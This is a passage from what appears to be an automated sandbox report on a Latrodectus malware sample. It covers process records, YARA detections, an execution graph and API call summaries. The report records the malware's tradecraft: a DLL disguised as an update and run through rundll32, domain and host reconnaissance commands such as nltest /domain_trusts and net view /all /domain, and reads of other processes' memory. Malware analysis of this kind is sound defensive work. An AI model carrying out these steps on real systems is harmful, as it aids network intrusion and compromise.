                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:02:46:49
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:02:46:50
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c ipconfig /all
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:02:48:43
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:ipconfig /all
                                                                Imagebase:0x7ff784320000
                                                                File size:35'840 bytes
                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c systeminfo
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:systeminfo
                                                                Imagebase:0x7ff647f00000
                                                                File size:110'080 bytes
                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:02:48:44
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff6ef0c0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:19
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c nltest /domain_trusts
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\nltest.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:nltest /domain_trusts
                                                                Imagebase:0x7ff7a6b60000
                                                                File size:540'672 bytes
                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\nltest.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                Imagebase:0x7ff7a6b60000
                                                                File size:540'672 bytes
                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:/c net view /all /domain
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:26
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:27
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\net.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:net view /all /domain
                                                                Imagebase:0x7ff7786b0000
                                                                File size:59'904 bytes
                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16.7%
                                                                  Total number of Nodes:1130
                                                                  Total number of Limit Nodes:16
                                                                  execution_graph 33430 b43084 33431 b43090 __FrameHandler3::FrameUnwindToState 33430->33431 33456 b42de4 33431->33456 33433 b43097 33434 b431ea 33433->33434 33445 b430c1 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 33433->33445 33490 b433a8 4 API calls 2 library calls 33434->33490 33436 b431f1 33491 b52ed9 23 API calls __FrameHandler3::FrameUnwindToState 33436->33491 33438 b431f7 33492 b52e9d 23 API calls __FrameHandler3::FrameUnwindToState 33438->33492 33440 b431ff 33441 b430e0 33442 b43161 33467 b434c3 GetStartupInfoW codecvt 33442->33467 33444 b43167 33468 b2cdb0 GetCommandLineW 33444->33468 33445->33441 33445->33442 33489 b52eb3 41 API calls 4 library calls 33445->33489 33457 b42ded 33456->33457 33493 b435a9 IsProcessorFeaturePresent 33457->33493 33459 b42df9 33494 b458dc 10 API calls 2 library calls 33459->33494 33461 b42dfe 33462 b42e02 33461->33462 33495 b5393e 33461->33495 33462->33433 33465 b42e19 33465->33433 33467->33444 33469 b2cdf8 33468->33469 33560 b21f80 LocalAlloc 33469->33560 33471 b2ce09 33561 b269a0 33471->33561 33473 b2ce58 33474 b2ce69 33473->33474 33475 b2ce5c 33473->33475 33569 b2c6a0 LocalAlloc LocalAlloc 33474->33569 33651 b26600 98 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 33475->33651 33478 b2ce65 33480 b2ceb0 ExitProcess 33478->33480 33479 b2ce72 33570 b2c870 33479->33570 33485 b2cea4 33653 b2cec0 LocalFree LocalFree 33485->33653 33486 b2ce9a 33652 b2cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33486->33652 33489->33442 33490->33436 33491->33438 33492->33440 33493->33459 33494->33461 33499 b5bedb 33495->33499 33498 b458fb 7 API calls 2 library calls 33498->33462 33500 b5beeb 33499->33500 33501 b42e0b 33499->33501 33500->33501 33503 b56d2d 33500->33503 33501->33465 33501->33498 33504 b56d39 __FrameHandler3::FrameUnwindToState 33503->33504 33515 b51c9a EnterCriticalSection 
34558->34503 34558->34508 34567 b38ad9 34559->34567 34569 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34560->34569 34570 b38e89 34561->34570 34572 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34562->34572 34563->34558 34573 b38db4 34564->34573 34581 b330e1 numpunct 46 API calls 34564->34581 34574 b38e5f 34565->34574 34575 b38d15 34566->34575 34568 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34567->34568 34576 b38ae1 34568->34576 34577 b38a3e 34569->34577 34578 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34570->34578 34571->34503 34579 b38e1e 34572->34579 34589 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34573->34589 34582 b38e72 34574->34582 34590 b33073 codecvt 41 API calls 34574->34590 34583 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34575->34583 34586 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34576->34586 34599 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34577->34599 34578->34522 34587 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34579->34587 34588 b38c16 34580->34588 34581->34573 34585 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34582->34585 34584 b38d22 34583->34584 34591 b32837 std::locale::_Locimp::_Makeushloc 72 API calls 34584->34591 34585->34522 34592 b38aee 34586->34592 34593 b38e2b 34587->34593 34594 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34588->34594 34595 b38dc4 34589->34595 34590->34582 34597 b38d2c 34591->34597 34598 b32d74 std::locale::_Locimp::_Makeushloc 74 API calls 34592->34598 34600 b32f33 std::locale::_Locimp::_Makeushloc 72 API calls 34593->34600 34601 b38c23 34594->34601 34596 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34595->34596 34602 b38dd1 34596->34602 34603 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34597->34603 34604 b38af8 34598->34604 34605 b38a5b 34599->34605 34606 b38e35 34600->34606 34607 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34601->34607 34608 b26330 
std::locale::_Locimp::_Makeushloc LocalAlloc 34602->34608 34609 b38d34 34603->34609 34610 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34604->34610 34611 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34605->34611 34612 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34606->34612 34613 b38c2c 34607->34613 34614 b38ddb 34608->34614 34615 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34609->34615 34610->34616 34617 b38a68 34611->34617 34612->34521 34621 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34613->34621 34618 b38dfb 34614->34618 34622 b3869e std::locale::_Locimp::_Makeushloc 42 API calls 34614->34622 34619 b38d41 34615->34619 34616->34488 34620 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34617->34620 34627 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34618->34627 34623 b329f6 std::locale::_Locimp::_Makeushloc 74 API calls 34619->34623 34624 b38a72 34620->34624 34625 b38c49 34621->34625 34622->34618 34626 b38d4b 34623->34626 34628 b38a9b 34624->34628 34631 b38555 std::locale::_Locimp::_Makeushloc 44 API calls 34624->34631 34629 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34625->34629 34630 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34626->34630 34627->34521 34634 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34628->34634 34632 b38c56 34629->34632 34633 b38d53 34630->34633 34631->34628 34635 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34632->34635 34636 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34633->34636 34634->34616 34637 b38c60 34635->34637 34638 b38d60 34636->34638 34639 b38c8c 34637->34639 34641 b38386 moneypunct 44 API calls 34637->34641 34640 b32961 std::locale::_Locimp::_Makeushloc 74 API calls 34638->34640 34643 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34639->34643 34642 b38d6a 34640->34642 34641->34639 34644 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34642->34644 34645 b38ca4 34643->34645 34644->34511 
34646 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34645->34646 34647 b38cb1 34646->34647 34648 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34647->34648 34649 b38cbb 34648->34649 34650 b38ce8 34649->34650 34651 b38386 moneypunct 44 API calls 34649->34651 34652 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34650->34652 34651->34650 34652->34511 34654 b28c4b 34653->34654 34655 b28c7d 34653->34655 34656 b30ed6 std::_Lockit::_Lockit 7 API calls 34654->34656 34655->34095 34655->34096 34657 b28c55 34656->34657 34658 b30f2e std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 34657->34658 34658->34655 34659->34107 34660->34114 34661->34089 34662->34112 34663->34125 34664->34117 34665->34135 34666->34144 34667->34149 34668->34155 34669->34156 34670->34090 34671->34113 34672->34127 34673->34139 34674->34143 34675->34150 34676->34090 34677->34122 34678->34093 34679->34124 34680->34093 34682 b2c240 std::invalid_argument::invalid_argument 41 API calls 34681->34682 34683 b2d29d 34682->34683 34684 b43e5a 34683->34684 34685 b43ea1 RaiseException 34684->34685 34686 b43e74 34684->34686 34685->34163 34686->34685 34688 b25d6e 34687->34688 34690 b25d7d 34688->34690 34711 b24a10 41 API calls 3 library calls 34688->34711 34690->33806 34692 b259f8 34691->34692 34696 b25a03 34691->34696 34693 b25d30 41 API calls 34692->34693 34695 b25a01 34693->34695 34694 b22310 56 API calls 34697 b25a1a 34694->34697 34695->33812 34696->34694 34696->34697 34712 b25a60 42 API calls 34697->34712 34713 b47869 34699->34713 34703 b25971 34702->34703 34704 b2572d 34702->34704 34703->34704 34705 b25981 CloseHandle 34703->34705 34704->33845 34705->34704 34706->33828 34707->33818 34708->33821 34709->33825 34711->34690 34712->34695 34718 b47078 34713->34718 34719 b47096 34718->34719 34720 b4708f 34718->34720 34719->34720 34761 b557cc GetLastError 34719->34761 34726 b476d9 34720->34726 34729 b47709 ___crtCompareStringW 34726->34729 34731 b476f3 34726->34731 34728 b476f8 34802 
b47017 41 API calls collate 34728->34802 34730 b47720 34729->34730 34729->34731 34734 b47702 34730->34734 34803 b55c2a 6 API calls 2 library calls 34730->34803 34801 b47370 14 API calls std::_Stofx_v2 34731->34801 34738 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34734->34738 34735 b4776e 34736 b4778f 34735->34736 34737 b47778 34735->34737 34740 b47794 34736->34740 34741 b477a5 34736->34741 34804 b47370 14 API calls std::_Stofx_v2 34737->34804 34742 b253d3 34738->34742 34806 b47370 14 API calls std::_Stofx_v2 34740->34806 34745 b47826 34741->34745 34751 b477b9 __alloca_probe_16 34741->34751 34807 b55bdc 34741->34807 34742->33810 34742->33816 34743 b4777d 34805 b47370 14 API calls std::_Stofx_v2 34743->34805 34817 b47370 14 API calls std::_Stofx_v2 34745->34817 34748 b4782b 34818 b47370 14 API calls std::_Stofx_v2 34748->34818 34751->34745 34754 b477e6 34751->34754 34752 b47813 34819 b42326 14 API calls std::_Locinfo::_W_Getmonths 34752->34819 34814 b55c2a 6 API calls 2 library calls 34754->34814 34756 b47802 34757 b47809 34756->34757 34758 b4781a 34756->34758 34815 b4b762 41 API calls 2 library calls 34757->34815 34816 b47370 14 API calls std::_Stofx_v2 34758->34816 34762 b557e2 34761->34762 34763 b557e8 34761->34763 34793 b575d7 6 API calls std::_Lockit::_Lockit 34762->34793 34767 b557ec SetLastError 34763->34767 34794 b57616 6 API calls std::_Lockit::_Lockit 34763->34794 34766 b55804 34766->34767 34769 b570bb __Getctype 14 API calls 34766->34769 34771 b55881 34767->34771 34772 b470b7 34767->34772 34770 b55819 34769->34770 34773 b55821 34770->34773 34774 b55832 34770->34774 34799 b52a07 41 API calls __FrameHandler3::FrameUnwindToState 34771->34799 34788 b55ab7 34772->34788 34795 b57616 6 API calls std::_Lockit::_Lockit 34773->34795 34796 b57616 6 API calls std::_Lockit::_Lockit 34774->34796 34779 b5582f 34783 b553b8 ___free_lconv_mon 14 API calls 34779->34783 34780 b5583e 34781 b55842 34780->34781 34782 b55859 34780->34782 34797 
b57616 6 API calls std::_Lockit::_Lockit 34781->34797 34798 b555fa 14 API calls __Getctype 34782->34798 34783->34767 34786 b55864 34787 b553b8 ___free_lconv_mon 14 API calls 34786->34787 34787->34767 34789 b470cd 34788->34789 34790 b55aca 34788->34790 34792 b55b15 41 API calls std::_Locinfo::_W_Getmonths 34789->34792 34790->34789 34800 b5d657 41 API calls 4 library calls 34790->34800 34792->34720 34793->34763 34794->34766 34795->34779 34796->34780 34797->34779 34798->34786 34800->34789 34801->34728 34802->34734 34803->34735 34804->34743 34805->34734 34806->34728 34808 b55c1a 34807->34808 34812 b55bea std::_Locinfo::_W_Getmonths 34807->34812 34821 b47370 14 API calls std::_Stofx_v2 34808->34821 34810 b55c05 RtlAllocateHeap 34811 b55c18 34810->34811 34810->34812 34811->34751 34812->34808 34812->34810 34820 b5bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 34812->34820 34814->34756 34815->34752 34816->34752 34817->34748 34818->34752 34819->34734 34820->34812 34821->34811

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                    • Part of subcall function 00B257C0: GetCurrentProcess.KERNEL32(00000008,?,823FDEC6,?,-00000010), ref: 00B257D0
                                                                    • Part of subcall function 00B257C0: OpenProcessToken.ADVAPI32(00000000), ref: 00B257D7
                                                                  • CoInitialize.OLE32(00000000), ref: 00B24C15
                                                                  • CoCreateInstance.OLE32(00B672B0,00000000,00000004,00B75104,00000000,?), ref: 00B24C45
                                                                  • CoUninitialize.OLE32 ref: 00B25187
                                                                  • _com_issue_error.COMSUPP ref: 00B251B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                  • String ID:
                                                                  • API String ID: 928366108-0
                                                                  • Opcode ID: e2c145b60b30e7f1da0dc782bb7dc577d267342bf3b206292b9fd5d5f69dc0ce
                                                                  • Instruction ID: b4bd4884586efed6041f5e478650608174ae2a7c24be74f3cc7fdc582cc049be
                                                                  • Opcode Fuzzy Hash: e2c145b60b30e7f1da0dc782bb7dc577d267342bf3b206292b9fd5d5f69dc0ce
                                                                  • Instruction Fuzzy Hash: 8C22BE70A04398DFEB21CFA8D948BADBBF4EF45308F1481D9E409EB281DB759A45CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                    • Part of subcall function 00B236D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B23735
                                                                    • Part of subcall function 00B236D0: _wcschr.LIBVCRUNTIME ref: 00B237C6
                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00B23CA8
                                                                  • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 00B23CC4
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B23D01
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B23D7A
                                                                  • ReadProcessMemory.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00B23EB1
                                                                  • GetLastError.KERNEL32 ref: 00B23F34
                                                                  • FreeLibrary.KERNEL32(?), ref: 00B23F7B
                                                                  Strings
                                                                  • NtQueryInformationProcess, xrefs: 00B23CA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MemoryRead$AddressDirectoryErrorFreeInformationLastLibraryProcQuerySystem_wcschr
                                                                  • String ID: NtQueryInformationProcess
                                                                  • API String ID: 847666571-2781105232
                                                                  • Opcode ID: d014acc574ebe855bf45e3fe304baca51413b42f00701b77bccfa7a4a86a4062
                                                                  • Instruction ID: eba0bc82c5e00bc9b45f9d7962dc369d4748adbd5b08c4245cb1f8c74112e3fe
                                                                  • Opcode Fuzzy Hash: d014acc574ebe855bf45e3fe304baca51413b42f00701b77bccfa7a4a86a4062
                                                                  • Instruction Fuzzy Hash: 87A17D70904659DEDB20DF64DD497AEBBF0FF48708F10459DD409A7280EBB95A88CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B238CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B2390B
                                                                  • Process32FirstW.KERNEL32(?,00000000), ref: 00B2395F
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B2397A
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B23A8E
                                                                  • Process32NextW.KERNEL32(?,00000000), ref: 00B23AA2
                                                                  • CloseHandle.KERNEL32(?), ref: 00B23AF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Close$HandleProcess32$ChangeCreateFindFirstNextNotificationOpenProcessSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 2156003543-0
                                                                  • Opcode ID: df6a2b08b9440f34e21460382807ff7979194ad904fc0738e7440f211d3a1ed6
                                                                  • Instruction ID: 9b8fbf19fdbd81e3139c0ce12d8d6ca80ac13d5c2e2fe9c475833056934129b8
                                                                  • Opcode Fuzzy Hash: df6a2b08b9440f34e21460382807ff7979194ad904fc0738e7440f211d3a1ed6
                                                                  • Instruction Fuzzy Hash: 73A10E71901259EFDF10CFA4D988BDEBBF8FF49704F144199E819AB290D7B85A44CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

